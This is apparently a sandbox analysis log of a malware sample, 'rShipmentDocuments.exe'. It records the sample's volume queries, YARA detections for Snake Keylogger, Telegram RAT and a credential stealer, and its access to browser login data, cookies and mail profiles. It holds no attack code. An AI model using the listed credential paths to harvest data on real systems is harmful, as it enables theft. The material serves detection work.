Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
